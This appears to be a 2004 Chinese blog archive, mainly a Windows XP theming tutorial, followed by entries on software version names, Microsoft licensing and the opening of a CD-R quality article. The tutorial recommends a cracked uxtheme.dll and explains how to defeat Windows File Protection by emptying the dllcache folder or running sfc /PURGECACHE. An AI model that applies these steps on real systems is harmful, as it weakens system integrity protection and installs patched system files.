如今我们说的修改系统主题,一般没有说明都是指的windows xp,因为对xml的支持比较完善。有很多使用win2000的朋友问我是不是也能改一改,我只能说——能改,但是很有限(除非 你使用一些专门修改主题的商业软件,如windowsblind),但是这些软件对资源的消耗就有一些让人不能忍受了,而且据说 有些这样的主题还会导致windows的一些功能不能正常使用(道听途说,未经证实!)。对于以前的win9x,我记得有一个p owertoy的工具可以换主题,但是在9x的系统环境下,我个人认为改不出太眩目的主题来,顶多是换换图标!还有就是最新的w indows2003,这个系统也是支持主题的,但是在安装完毕后你不能使用,需要打开“管理工具”——“本地计算机管理”—— “服务”中的“theme”服务,设置为“自动”并启动它,然后是替换那个“著名”的“UxTheme.dll”文件,但是要注 意版本,在后面我会提供一个自动替换uxtheme.dll的程序。

关于windows的文件保护
也有很多朋友在问我这个问题啦,但是,我也没有找到 能彻底屏蔽“ 文件保护”的 方法,我试过修改注册表(但是国外一个权威组织说这个方法在安装了sp1的系统上也不能100%有效),我还试过编辑本机组策略 ,都不能很好地屏蔽掉这个功能,但是有一点还是让我们欣慰的,在使用组策略编辑和修改注册表后可以使“文件保护”的对话框的弹出 频率减少!

关于主题的和谐
我看了很多朋友展示的桌面,有的的确很漂亮,但是, 有一些可以说 就是对资源的 堆砌(对不起,可能是在下眼拙!),如今国外倡导的是主题的简单和平淡,而不是满屏幕的128*128图标,花花绿绿的墙纸(我 不是崇洋媚外,只是老外在这方面的确比我们走得更远些),选择更和谐的样式——细线条,淡色背景,简单直观的图标,这也是对个人 审美素质的一种培养!

关于手工修改
有的朋友问我为什么在修改了样式以后,ie的工具栏 并没有变化, 登陆和注销的 画面没有变,其实这些东西不是样式文件能直接修改的,因为存在操作的危险性,所以准备放在最后介绍。

做个“好色”的电脑——工具篇

“工欲善其事,必先利其器”

¤样式(visualstyle)修改工具
1.uxtheme.dll破*版(根 据xp版本而 定),严格的说这个不能算是工具,但是对于修改xp的主题,这个文件是至关重要的!
2.stylebulider 不想多说了,tgtsoft公司出品的制作vs的专业工具,目前还没有能出其右的软件出现。

¤图标制作修改工具
1.IconWorkshop强大的图 标制作和修改 软件,支持各 种图标格式,可建立图标库,并支持各种规格的图标转换,支持各种图形格式,使图标制作的方法变得更丰富!
2.IconPackager,本身其 实是windowsbli nd的一个组件,可以独立运行,在不占用系统资源的情况下对windows系统的系统图标进行替换,这个替换的工作其实质是利用 有序的图标库文件(.icl)对系统图标缓存进行刷新,只要你不重建系统图标缓存,被替换的图标将一直保留!

¤文件资源修改工具
其实很多朋友都知道一个软件叫做eXe Scope, 这个是汉化软件领域的利器 ,不过针对不同的使用环境,我强烈推荐ResHacker,这类软件可以对系统文件(.exe .dll .cpl)中的文字,图标,位图,avi等资源进行替换,是主题高级修改必不可少的软件。
最后就是文本编辑软件,如UltraEdit

在准备好以上的所有软件后,我们就可以开始我们的个性化之旅了……

做个“好色”的电脑——替换篇

有的朋友可能会提出这样的问题,在“工具篇”中我为什么没有提到Style XP这个著名的软件。请你接着往下看就会明白——
早期的Style XP是一个共享软件, 它的工作原理 其实很简单,就是用自己的主题支持模块接管了系统中uxtheme.dll的工作,使得xp能 接受第三方的桌面主题,后来,由于某些高手破*了系统自带的uxtheme.dll文件,tgtsoft不得不将Style XP发布为一个免费的软件,不过这种情况并没有持续多长时间,原因是使用破*的uxtheme .dll文件去替换系统中的原文件 受到“系统文件保护”功能的限制,而且这样的操作根据系统的版本不同会存在一定的危险性,给一些新手造成心理上的恐惧。
再来看看Style XP的缺点,由于xp是一个具有用户认证的系统,为了让不同用户等级的用户都能使用Style XP,Style XP本身在系统启动时并不会得到一个较高的优先级,这就使得这个软件给我 们造成了不稳定的假像,它这么做其实就是为了稳定,不过代价就是这个软件并不是在任何情况下都灵,而且,我们在追求美感的同时难 免会使用一些额外的软件,如Samurize、Rainlendar来增强一些效果,系统资源就显得很宝贵,虽然Style XP在后台运行时对资源的占用已经很低了,但是我们可以节约这一点资源,又得到相同效果的情况下,我们为什么不放弃这个软件呢? 当然,如果你是才接触桌面修改的人,可以先用用Style XP,等你了解了其中的奥秘,我相信,你一定会转到下面的方法来打造你的“个性自治区”的。
了解了上面的一些背景知识,我们来看看替换的方法——
首先,根据你所使用的系统(En XP+Sp1或者是CHS Xp,CHS xp+sp1)选择相应的uxtheme.dll版本。然后是绕过“系统文件 保护”,要绕过“系统文件保护”其实很简单,你可以 修改注册表或者使用“组策略编辑器”来完成,但是根据我的实际经验,这些方法都不能很好地达到效果!在研究了“系统文件保护”功 能以后发现,xp的“系统文件保护”功能其实是使用磁盘上的空间将受保护的文件做了一个备份,一旦系统发现文件被修改或者是被替 换,立即用备份的文件恢复,这个过程只是一瞬间的事。了解了这个原理,要取消这个功能就变得很简单了,你可以进入
c:\windows\system32\dllcache这个 目录(dllcache目录是隐藏的),删除里面所有的文件,这 样,在你替换文件的时候,“系统文件保护”仍然会起作用,不过,它就没有文件可以恢复了,我们就达到了我们的目的,这时候只需要 找到要替换的文件,改名(这一步非常重要),然后复制你想替换的文件就可以了!当然,xp也提供这样的一个命令来自动清除dll cache文件夹中的内容:sfc /PURGECACHE
说了这么多,无非是想让大家对这个过程 有一个了解,下面的这个文 件使替换的工作变得非常轻松,它可以自动替换uxtheme.dll文件,并且能自动识别你所使用的系统的版本
下载:各版本xp或2003自动替换uxtheme.dll程序.rar

做个“好色”的电脑——实战篇

之一——系统属性对话框的修改

其实修改系统属性对话框跟主题的修改并 没有太大的联系,当朋友们遇到非常喜欢的主题,又追求完美的时候,修改系统对话框可以使这一位置的显示更配合主题,不过,把这个 放在最前面介 绍主要是为了让大家看看——其实修改系统文件并不是想像的那么困难。首先我们来看看修改后的效果图。

图中一共有8个部分,修改不同部分涉及 到不同的方法 ,不同的工具 ,下面我一一 讲解:
对于第1部分,我们需要用到在工具篇中 提到的Res Hacker 这个工具,在你准备好工具以后,在自己的硬盘上建立一个临时的目录,从你的系统c:\windows\system32中复制文 件sysdm .cpl到这个临时目录,用ResHacker打开,看到如下图画面:

对于2、3、4、6部分和第7部分的按钮上中文部分在这里修改,如下图:

对于第7部分CPU频率和内存大小的修改(这个修改只是个自欺欺人的修改,完全属于教学意义!),请看下图:

到这里,需要Reshacker修改的地方就完成了,最后记得保 存,回到刚才建立的临时文件夹中,你会发现两个文件,一个是
sysdm.cpl,另一个是sysdm_original.cpl,复制前者到c:\windows\system32里替换 掉原文件,而后者是Reshacker自动生成的备份。
最后是第5和第8部分,这一部分不需要 用到特别的软 件,想必一些朋友买过或者是用过品牌机,这些机器的这两个位置一般显示的是机器生产厂商的标志和服务支持信息,这也就是我们平常 所说的OEM信息。其实这些信息都是由两个文件提供的,而一般用户独立安装的xp是没有这两个文件的,不过我们可以通过手动建立 的方法来实现这两个位置的显示:
首先,用记事本输入一下信息——
————-文件内容如下,请不要复制本行————–
[Version]
Microsoft Windows XP Home Edition
WinVer=5.01

[General]
Manufacturer=好多菩提树好多明镜台
Model=本来好多物好多的尘埃
[Support Information]
Line1=“Lalawu说——Coolmouse你给我出来!”
Line2=“你弄的是什么破电脑?”
Line3=“???”
Line4=“你说在google上什么都能找到?”
Line5=“是啊,什么信息都有啊?”
Line6=“我问google——你知道coolmouse的钱包还有多少钱吗?”
Line7=“google回答——对不起,请缩小搜索范围或修改关键字”

—————文件结束,请不要复制本行————

其中红色=后面双引号里面的内容都可以自由改动。在修改完里面的信息以后,记得保存这个文件为OEMINFO.ini
然后是找一幅自己喜欢的图片,修改其大 小为180× 110左右, 保存为OEMLOGO.bmp
把制作好的文件放到c:\window s\system32目录 里面,呵呵~~~这时候再让我们来看看你的系统属性,是不是很有个性,到这里,系统属性的修改就基本完成了!

做个“好色”的电脑——实战篇

之二——视觉样式(visualstyle)的修改

在介绍修改方法之前,先提供一些比较知 名的主题发布 站点,这些站 点主要以英文 为主,大家可以先去下面这些站点找找自己喜欢的vs,因为我发现一个有趣的现象——凡是初接触主题修改的朋友都非常喜欢用mac 的主题,但是在一段时间以后,你会发现mac的主题也乏味了。尝试不一样的感觉,其实我们的选择有很多。

http://www.customize.org/
http://www.deviantart.com/
http://www.designtechnika.com/ board/ index.php
http://www.visualstyles.net/
http://www.foood.net/icons/
http://www.wincustomize.com/
http://www.getskinned.org/

其实修改vs是个很空泛的概念,可以修改的东西实在很多,比如里面的图片,按 钮样式,文字的位置等等,如果这些都写出来的话,我想那不应该是一个帖子,而是一本书了,所以我要教大家最实用的,那就是——修 改vs的字体!
为什么单单要修改字体呢??因为从vs的产出量上看,欧美国家占据绝对优势, 而英文本身可以用7pt的字来显示就很好看了,对于我们的中文字体,一般需要使用8pt以上大小才能不费劲地看清楚,我们从老外 那里下载到好的主题,但是总不能因为字体太小就弃之不用吧。
好了,废话太多了,让我们拿起“武器”——StyleBuilder、Res Hacker和UltraEdit,顺便找一个对手,比如Simicro,这个vs下载回来直接用的话效果如下图:

可以发现,在这幅图里边,按钮和菜单中的中文字体显得很小,直接影响了我们识别!
然后我们来看看修改后得到的效果!

请对比一下上面两张图,是不是字体变大了呢?那我们来看看这种变化是如何实现的!
第一步:打开你的StyleBuilder,导入你要修改的vs

第二步:用UltraEdit打开临时目录下所有.Sb和.xml的文件
先来看看例子中的情况,

接着是用同样的方法将所有的.xml文件中相关部分替换掉,最后记得保存所有的文件。
现在再次打开你的StyleBuilder,你已经可以看到变化了,但是这样的东西是不能 用的,我们需要再用StyleBuilder编译这个vs,方法很简单,在StyleBuilder的菜单“action”中选 择“compile”,编译就完成了,这时候你回到那个临时的目录,找到那个Simicro.msstyles的文件,这就是你 的劳动成果,将这个文件复制出来替换到你下载回来的那个,呵呵~~你就基本成功了!!!

为什么是基本成功呢?呵呵~~再请看看这里

其实,这里以及其他的一些涉及到框架的部分都不归.msstyles文件管理 ,直接对这些位置起作用的是shellstyle.dll文件,这个文件对一个vs并不是必须的,如果一个vs存在多种配色方案 的话,那么每个配色方案对应一个shellstyle.dll文件。但是如果没有这个文件,这些位置就按照windows自己的 shellstyle.dll显示,。问题的症结就在这里,因为是dll文件
,所以我们请出我们主题美化界的“倚天剑”——reshacker
修改的步骤如下:
1.

2.

到此,修改才算真的结束了,激动不?是不是很有成就感,应用你修改以后的vs,应该是象下图了!

(呵呵,终于“写”完了,其实Simicro是个非常优秀的vs,也不知道大家是不是都能看明白,如果看不明白,我想应该是我表达上欠妥当,你有什么问题可以在后面跟帖询问!)

做个“好色”的电脑——实战篇

之三——综合技巧篇

1.Y’Zdock篇
这里有一些实现专用功能的物件连接指令,将其填入物件设置对话框的“链接到”编辑框中即可实现相应的功能:
(具体实现何功能自己尝试了happy
我的电脑 shell:DriveFolder
我的文档 shell:Personal
我的图片 shell:My Pictures
我的视频 shell:My Video
我的音乐 shell:My Music
网上邻居 shell:NetworkFolder
桌面  shell:Desktop
桌面  shell:DesktopFo lder
收藏夹 shell:Favorites
“发送到” shell:SendTo
“最近的文档” shell:Recent
开始菜单 shell:Menu
开始菜单-程序 shell:Programs
开始菜单-启动 shell:Startup
回收站 shell:RecycleBi nFolder
控制面板 shell:ControlPanelFo lder
网络连接 shell:ConnectionsFol der
字体  shell:Fonts
打印机 shell:PrintersF older
管理工具 shell:Administrative Tools
Windows文件夹 shell:Windows
系统文件夹 shell:System
System32文件夹 shell:SystemX86
WEB文件夹 shell:InternetFold er
用户数据文件夹 shell:Profile
程序  shell:ProgramFi les
程序公用文件 shell:CommonProgramFiles
模板  shell:Templates
打印  shell:PrintHood
网络  shell:NetHood
历史  shell:History
Cookies shell:Cooki es
本地程序数据 shell:Local AppData
程序数据 shell:AppData
共享文档 shell:Common Documents
公用管理工具 shell:Common Administrative Tools
公用模板目录 shell:Common Templates
公用程序数据 shell:Common AppData
公用收藏夹 shell:Common Favorites
公用桌面 shell:Common Desktop
公用菜单 shell:Common Menu
公用程序菜单 shell:Common Programs
公用启动菜单 shell:Common Startupr

2)添加搜索功能物件:
a. &nbs p;&nbs p;&nbs p;打开开始菜单,找到右边的“搜索(&S)”项图标;
b. &nbs p;&nbs p;&nbs p;用鼠标点住图标拖放到某个文件夹中(例如:“C:\Program Files”),就会自动生产一个快捷方式(例如:“C:\Program Files\搜索(&S)”);
c. &nbs p;&nbs p;&nbs p;随便选个应用程序拖放到停靠栏中,更改其属性,将其中的“链接到”编辑框的内容改为上面所生成的快捷方式的实际地址(例如: “C:\Program Files\搜索(&S)”),“工作目录”编辑框的内容改为快捷方式所在地目录即可(例如:“C:\Program Files”)。
注意:以上示例均不带引号“”。

3)关闭 Y’z Dock 后运行游戏(或一些需要全屏幕运行的应用程序):
a. &nbs p;&nbs p;&nbs p;用记事本创建一个文本文件,输入以下内容:

taskkill /IM YzDock.exe
“C:\Games\UT2003\ut2003.exe”

游戏名称根据具体情况更改;
b. &nbs p;&nbs p;&nbs p;将此文本文件另存为 .bat 批处理文件;
c. &nbs p;&nbs p;&nbs p;将保存的 .bat 批处理文件拖放到停靠栏即可。

4)添加音量控制物件:
a. &nbs p;&nbs p;&nbs p;随便先托放一个应用程序到停靠栏;
b. &nbs p;&nbs p;&nbs p;修改此物件属性

链接到:C:\WINDOWS\system32\sndvol32.exe
参数:/tray Normal
工作目录:C:\WINDOWS\system32\

5)添加拨号上网物件:
将“C:\Windows\syste m32\Ra sphone .exe”程序拖放到停靠栏即可。
或将“C:\Windows\syst em32\R asdial .exe”程序拖放到停靠栏,然后在修改其属性,在参数编辑框中填入“连接名称 用户名 密码”,运行方式选为“最小化”。此方式无需选择连接名称(操作时稍微快一些,个人认为还是第一种方式更好用)。

2.图标篇
桌面图标文字透明
在用iconpackage转换掉系统的图标以后, 可能你会发现 你桌面图标的 文字后面会出 现一个色块背景,这样一来就严重影 响了桌面的美观,我们必须把这些文字背景设置为透明,方法很简单,首先,在“显示”属性的“设置”标签中,将“颜色质量”设置为 32位色,再到“系统属性”中的选择“高级”标签,在性能一栏中点选“设置”,在弹出的“性能选项”对话框中将“在桌面上为图标 标签使用阴影”选中,这时候再看看桌面的图标,是不是比以前cool多了?

另附:桌面修改之大腕篇(个人原创,写得不好,纯属娱乐!)
一定得选最in的theme,中国人设计的,要改就改得连bill都不认识,全尺寸的图标,最小的也是128*128,什么天气 预报啊,dock啊,能加上的都给他加上,您还别嫌它占资源,你得研究用户的心理,能拿100m内存玩主题的主儿不在乎多用10 0m,瞧我的桌面,随手点开就是天气预报,有事没事就换个图标,还不重复,倍儿有面子,你要是用经典界面都不好意思开机!你知道 什么叫好色的电脑吗?好色的电脑就是——不求最快,但求最美!lalawu38014.5350231482

做个“好色”的电脑——实战篇

之四——玩转Samurize(一)

还是先来看看这个图

电脑换主题也许不是什么新鲜东西了,但 是要想在桌面 上做点能与网 络互动的元素 ,你就可以考 虑一下在桌面上做个天气预报,或者还可以把各地的电视节目预告也做到自己的桌面上,也许你认为这个只是windows中“活动桌 面”功能,那你就错了,因为活动桌面不过是在桌面上放了一个无边框的网叶,但是,我这里要说的是用Samurize这个软件来实 现!
也许你以前没有听说过或者使用过Sam urize, 不过,为了最 cool的效 果,你可以现 在就进入它的神奇世界。

最新版本:Samurize v1.1 Release
系统要求:1.只能运行于Win2k/WinXP.
2.GeFo rce 1或者更高版本显卡.
特别提醒:请 控制自己别对它上瘾!
Samurize可以做什么?
其实这个问题 应该写做Samurize 不可以做什么?当然,你不能用它来看电影,也不能用 它来格式化你的硬盘,虽然理论上这是可行的!基本上,你可以完全按照自己的想法定制所有可见或者不可见的元素!
资源占用: 1.在Celeron 633上测试cpu占用率<1.0%
2.对于内存 的占用的根据你所使用的功 能而定 &nb sp;
反安装Samurize:
我相信在一般 情况下你不会看这个部分的 ,因为你找不到理由要反安装它!敌人,如果因为你硬 件或者脚本的问题需要重新安装,那么在重新安装前,请删除注册表中HKEY_CURRENT_USER\Software\Se rious Samurize这个主键.
Samurize的配置对于新手来说真 有点不知道怎 么下手,不过 越具有挑战性 的东西在你做 成功之后越能有满足感,所以——站直了,别趴下。仔细看看就能搞定了!
其实,Samurize只 是一个外壳程序,由vbs脚本从网络上提取信息,然 后用类似于SKIN的方法 来显示在桌面上,只是这里 的SKIN换成了INI配置文件。
写这个主要是方便大家对软件的认识,由于这个软件需要大量的调试,所以先弄清楚这些细节以避免走弯路
\Samurize—-|
|—-\ Config 重要目录,存放你自己做的或者从网上下的配置文件
|
| —-\Icons 放这几个软件自带的图标,个人感觉没什么用处
|
| —-\Scripts 最重要的目录,存放实现各种不同功能的脚本(附件提供!)
|
| —-\Skins 在你自己设计配置时可以使用的一些素材
|
| —-Client.exe 客户端程序,绝对不是木马
|
| —-Config.exe 制作属于自己的配置文件要使用的工具
当然,Samurize自身也带有一些其他的插件!这里我砍张图,简单介绍一下,如果有朋友有兴趣,我会继续帖下去!
add text 增加文字(这里只是文字标签)
add active script 增加脚本
add console program 增加控制程序(这里可以使用一些dos命令,并返回
结果)
add date/time 增加日期和时间(这里是以你的系统时钟为基础)
add driver space 增加磁盘空间监视
add MBM 增加主板监视
add memory 增加内存监视
add perfMon 增加性能监视(这个涉及系统比较底层的东西)
add pop3 增加POP3信箱监视
add text file 增加文本文件
add total up/down 增加网络流量监视
add uptime 系统工作的时间
add winamp 增加对winamp的监视
add laptop battery 增加对笔记本电源的监视

做个“好色”的电脑——实战篇

之四——玩转Samurize(二)

还是先来看看这个图:

本教程基本内容以上图为准,手把手教你做这样一个sidebar。
1。准备背景

为什么我要把钟表面直接放在这个背景上?因为等一下要在这个钟面上添加时针分针秒针,而为了走时精确,必须找准钟面的圆心,另外 一个考虑就是在config中选择重合在一起的几个控件非常麻烦,所以才将其做在了背景上!
2。做收藏夹部分(简单)
先放一个text控件做为标题,例子中写的是Favorites
然后是做Favorites下的各个项目
我们拿图中的pcpchina为例,添加一个text控件,把下面的“allow meter-linkage”选上,紧接着,在下面的“link meter to”中填上网站地址,形式如:http://xxx.xxxx.xxx
最后在下方的“text”属性中写上这个收藏网站的名字!
其他的收藏夹都这样制作,这里不再赘述。
3。时钟部分
分别添加三个time/date控件,分别为时针、分针和秒针
将每个控件的”draw type“属性选择为”analog“
时针的min value 为0 max value为12
start angle 为90 ,sweep为-360
format 设置为”%h“
分针的min value 为0 max value为60
start angle 为90 ,sweep为-360
format 设置为”%m“
秒针的min value 为0 max value为60
start angle 为90 ,sweep为-360
format 设置为”%s“
到这里每根针的属性基本设置完了
我们需要通过通过改变”test vavle“的值来找到钟面的中点,依次将三根针放好,这一部分也算完成了!

做个“好色”的电脑——实战篇

之四——玩转Samurize(三)

接着是下面的图片幻灯显示
首先我们需要一个脚本来控制,这个脚本是我一边看msdn的教程一边写出来的,其实很简单。
—————————脚本开始(请不要复制本行)——————– ——-
SamurizeDir = CreateObject(“WScript.Shell”).RegRead(“HKEY_CURRENT_USER\Sof tware\Serious Samurize\General\DirPath”) ‘创建一个读取Samurize注册表中键值的对象
PNG_Folder = SamurizeDir & “RandomPNG\” ‘设置png图像保存的位置
NumberOfPNGs = 10 &nb sp; ‘图片的数量
UseNumberedPNGs = True ‘允 许图片使用数字编号的文件名,这样比较便于管理
’下面是这个脚本中唯一的函数
Function RandomPNG()
Randomize : RandomPNGNumber = Int((NumberOfPNGs)*Rnd(1)+1)

If UseNumberedPNGs Then
PNGFileName = RandomPNGNumber & “.png”
Else
If RandomPNGNumber = 1 Then PNGFileName = “1.png”
If RandomPNGNumber = 2 Then PNGFileName = “2.png”
If RandomPNGNumber = 3 Then PNGFileName = “3.png”
If RandomPNGNumber = 4 Then PNGFileName = “4.png”
If RandomPNGNumber = 5 Then PNGFileName = “5.png”
If RandomPNGNumber = 6 Then PNGFileName = “6.png”
If RandomPNGNumber = 7 Then PNGFileName = “7.png”
If RandomPNGNumber = 8 Then PNGFileName = “8.png”
If RandomPNGNumber = 9 Then PNGFileName = “9.png”
If RandomPNGNumber = 10 Then PNGFileName = “10.png”
End If
RandomPNG = PNG_Folder & PNGFileName
End Function

—————————脚本结束(请不要复制本行)——————– ——-
将上面的内容复制粘贴到记事本,保存的时候”文件类型“选择”所有文件“,文件名命名为”randomPNG.vbs“,将这个 文件放到Samurize的scripts目录下~
然后在你的Samurize目录下新建 一个Rand omPNG目 录,并在其中 放入10个大 尺寸一样的png图片。到这里,准备工作就算完成了!!
下面是编辑config,添加一个”active script“
“draw type”选择为”PNG image“
“select script”选择”randomPNG.vbs“
“select funcition to run“选择”randomPNG”
好了,这里又ok了!!
讲了这么多,基本上samurize的制作过程就是这样,图中的winamp控制和系统信息都比较简单,这里就不一点点写了!

2004年08月14日

http://www.shuku.net/novels/classic/digonga/dga.html

引起

http://www.tydao.com/sxren/zhenzhi/direnjie.htm

扫兴,今晚的又结束了

2004年08月12日

http://www.pcpro.com.cn/bbs/viewthread.php?tid=1096

alphal 内部测试版

beta 外部测试版

demo 演示版

Enhance 增强版或者加强版 属于正式版

Free 自由版

Full version 完全版 属于正式版

shareware 共享版

Release 发行版 有时间限制

Upgrade 升级版

Retail 零售版

Cardware 属共享软件的一种,只要给作者回复一封电邮或明信片即可。(有的作者并由此提供注册码等),目前这种形式已不多见。

Plus 属增强版,不过这种大部分是在程序界面及多媒体功能上增强。

Preview 预览版

Corporation & Enterprise 企业版

Standard 标准版

Mini 迷你版也叫精简版只有最基本的功能

Premium -- 贵价版

Professional -- 专业版

Express -- 特别版

Deluxe -- 豪华版

Registered -- 已注册版

CN -- 简体中文版

CHT -- 繁体中文版

EN -- 英文版

Multilanguage -- 多语言版

Rip 是指从原版文件(一般是指光盘或光盘镜像文件)直接将有用的内容(核心内容)分离出来,剔除无用的文档,例如PDF说明文件啊,视频演示啊之类的东西,也可以算做是精简版吧…但主要内容功能是一点也不能缺少的!另:DVDrip是指将视频和音频直接从DVD光盘里以文件方式分离出来。

trail 试用版(含有某些限制,如时间、功能,注册后也有可能变为正式版)

RC 版。是 Release Candidate 的缩写,意思是发布倒计时,该版本已经完成全部功能并清除大部分的BUG。到了这个阶段只会除BUG,不会对软件做任何大的更改。

RTM 版。这基本就是最终的版本,英文是 Release To manufacturer,意思是发布到生产商。

Original Equipment Manufacturer (OEM)

You may license products through an Original Equipment Manufacturer (OEM). These products, such as Windows operating systems, come installed when you purchase a new computer.

OEM软件是给电脑生产厂的版本,无需多说。

Full Packaged Product (FPP)–Retail

Physical, shrink-wrapped boxes of licensed product that can be purchased in a local retail store or any local software retailer.

FPP就是零售版(盒装软件),这种产品的光盘的卷标都带有“FPP“字样,比如英文WXP Pro的FPP版本的光盘卷标就是WXPFPP_EN,其中WX表示是Windows XP,P是Professional(H是Home),FPP表明是零售版本,EN是表明是英语。获得途径除了在商店购买之外,某些MSDN用户也可以得到。

Volume Licensing for Organizations (VLO)

  You may enjoy potentially significant savings by acquiring multiple product licenses. Depending on the size and type of your organization.

  团体批量许可证(大量采购授权合约),这是为团体购买而制定的一种优惠方式。这种产品的光盘的卷标都带有“VOL“字样,取“Volume“前3个字母,以表明是批量,比如英文WXP Pro的VOL版本的光盘卷标就是WXPVOL_EN,其中WX表示是Windows XP,P是Professional(VOL没有Home版本),VOL表明是团体批量许可证版本,EN是表明是英语。获得途径主要是集团购买,某些MSDN用户也可以得到。
这种版本根据购买数量等又细分为“开放式许可证”、“选择式许可证”、“企业协议”、“学术教育许可证”等以下5种版本

  Open License
  Select License
  Enterprise Agreement
  Enterprise subscription Agreement
  Academic Volume Licensing

  由此可见,平时说的什么select/corp是许可证授权方式,他的出现是为了用若干种不同级别的优惠政策卖同一种软件,通过select/corp许可证授权方式得到的xxx的光盘都是VOL这一种、是并不是有很多种,只不过是相同的VOL光盘配以不同的许可证方式;而Volume Licensing (Product) Keys,即VLK,它所指的只是一个Key(密匙),仅仅是一个为证明产品合法化、以及安装所使用的Key,因为根据VOL计划规定,VOL产品是不需要激活的!

  或者说,VLK不是指一种版本,而是指这种版本在部署(deploy)过程中所需要的Key,而需要VLK这种Key的版本应该叫做VOL!只不过在实际中,没有必要强调这种叫法、称呼的准确性,加之很多人的VOL版本光盘是通过企业的选择式许可证、企业协议等方式得到的等等原因,所以才会有很多人叫他为“选择版”等等。
官方网站有一个表格,上面有一句话:“Different products require different Volume Licensing Keys (VLKs). Refer to the table below to make sure you have the correct VLK for your Microsoft product.”,我想这就很好的说明了VLK指的是Key而不是产品了。 很明显的,FPP需要激活,VOL不需要激活。

顾名思义

http://cb.kingsoft.com/

ps.对原文按理解后做了些修改,若有异意,请指出,谢谢。

2004年08月09日

http://www.isso.com.cn/readarticle/25/25123.asp

第 1 页 (本文共6页)
  来自段网友A鄙声明:应人之邀,作此文。非软文,仅供易索专稿无偿使用,本人不再多投,请不将此文转载其他任何媒体,无论是有偿还是无偿。

  前言
  随着cdr刻录机的基本普及,dvdr刻录机也逐渐把速率提升到4x,乃至8x这样为大众可以接受的程度,选购盘片成为大伙经常要做的事情,对于宁波本地的碟片市场,作为外埠人的笔者来看,简直可以用混乱一个字来代替,很多人连什么是好都不知道,更谈不上知道性价比了。如果说dvdr由于目前用户数量不多,还处于一个启动的阶段,很多人都对价格不是很清楚,对如何判别正伪以及质量不甚了了的话,那还可以理解。但对于已经基本成熟的cdr市场,这实在说不过去了。在下仅此抛砖引玉,为的是让广大diy们对盘片有个全面的理解。

  Part1 拨开cdr的价格等级迷雾
  目前市场上由于价格的因素,合装盘已经渐渐的退出市场,取而代之的是桶装盘:50p一桶、25p一桶、10p一桶、100p一桶、诸如此类不胜枚举。一般低档盘片开价约摸在1块6到1块8之间,中高端盘片开价在2块至3块之间。品牌繁多,比较受欢迎的无非就是大自然,清华同方,啄木鸟,荣立,明基等品牌,价格适中。高端一般常见的就是三菱,sony,maxell,tdk。本地市场tdk不常见。至于曾经风光的kodak,hp等品牌基本上都已经停产,如果看到标称在16x以上的kodak,hp可以确认是假货了。在此部分中,cdr的真假不在讨论范围,因此就不进行展开。1块6,1块8,2块,3块。如果确定自己选购的盘片没有给js黑,是比较正常价格购入的话,那到底哪个才是真正优质a级碟片价格呢?答案是:一个都不是。
  
  在国际市场上,a级标准盘片的100万片代工价格要2毛4-3毛美元,加上印刷成本,包装成本,运输成本,税费,以及零售批发的基本利润,那基本上折合人民币的零售价格就要3块以上。而盘片中的盘基部分,还要受石油价格的影响发生变动,在早年,cdr盘卖30块钱的时候,盘片成本主要都在染料方面,如今,染料价格已经非常低了,盘基的价格自然变动就比较明显,国际石油价格在近几年内,并没有下跌,反而逐渐上涨。那中国市场上的1块8毛钱的国际a级是那里出来的呢?下面的图片是笔者在法兰克福购入的tdk盒装audio专用碟。

tdk日本原厂生产,每片售价为税前0.99欧元,当时还觉得贵。此后从巴黎看到的价格是2块2欧元,最便宜的是迪拜机场看到的价格是1块8美元。此后有德国的hifi发烧友告知在德国最大的电脑超级市场中,TDK顶级的AUDIO盘片圣诞节期间的特惠价格也要2.4欧元。当然,这个盘是音乐专用碟,且是盒装,价格偏高。但这样的价格如果在国内,估计人家要以为卖的人是抢钱了。但,国外的盘的确不便宜,1欧元的价格是家常便饭。下图为本人从布达佩斯购入的plextor 48x桶装盘

50p布丁桶包装。plextor一直都是全球最著名的光储厂商,此盘片为日本taiyoyuden公司oem。笔者买入的价格是25美元,折合下来,差不多要4块人民币/p,国外零售价一般都含税,因此根据国内的现状来算,大概也就是3块5的样子。欧洲市面上也有国内可以见到的台湾品牌在卖,如prodisc精碟的自有品牌smartbuy,cmc中环的自有品牌mr.data等,盒装报价一般在6毛欧元左右。桶装的和pelxtor价格相差不大。难道说欧洲人都是白痴?不知道价格高低?在全球市场上,中国没有制造能力的产品都是中国的贵,这个是不争的事实。别看小小的刻录盘,他的重要组成部分染料,以及盘基用的聚碳酸脂都是日本厂商掌握或者必须进口的,国内厂家一般都是台湾企业在大陆开设的工厂。国内的大XX,eXXXX等号称远销欧美,这个欧,我只能估计是独联体,美大概也就是拉美,至少本人在欧洲,没有见过这样的东西。

  真正的欧洲、北美对产品品质要求非常严格,对于不合格的碟片造成的数据损失,厂商会有巨额的罚款单等着他,而国内就二个字:包换。但你的数据呢?也能包换?a级盘不是自己说a级就是a级,就好比乡镇企业自己标的认证合格,不代表ce认证,国际通用的a级标准和厂家自己的a级标准不能混为一谈。我可以那么说,国内销售的盘片,尤其是宁波市场上,桶装,甚至包括盒装几乎没有一种是真正的国际a级盘,最好的三菱或者sony也才是台湾,香港厂商的b级,普通有大厂的c级就不错了,一般都是大陆的b级或者a级。更可怕的就是那些杂牌山寨厂的c级,甚至是等外级别的盘,那个几乎不能用。
第 2 页 (本文共6页)

  Part 2 高档和低档区别
  有些朋友很不以为然的对我说:没关系,只要便宜就成,管他a级b级还是等外级,而且,就算刻坏了还能包换,没事。笔者认为此话有失偏颇了,我们先来看一下高等级的cdr所必须具备的几个组成部分:

  1、盘基
  2、反射层
  3、染料涂层
  4、紫外线保护层
  5、表面保护层

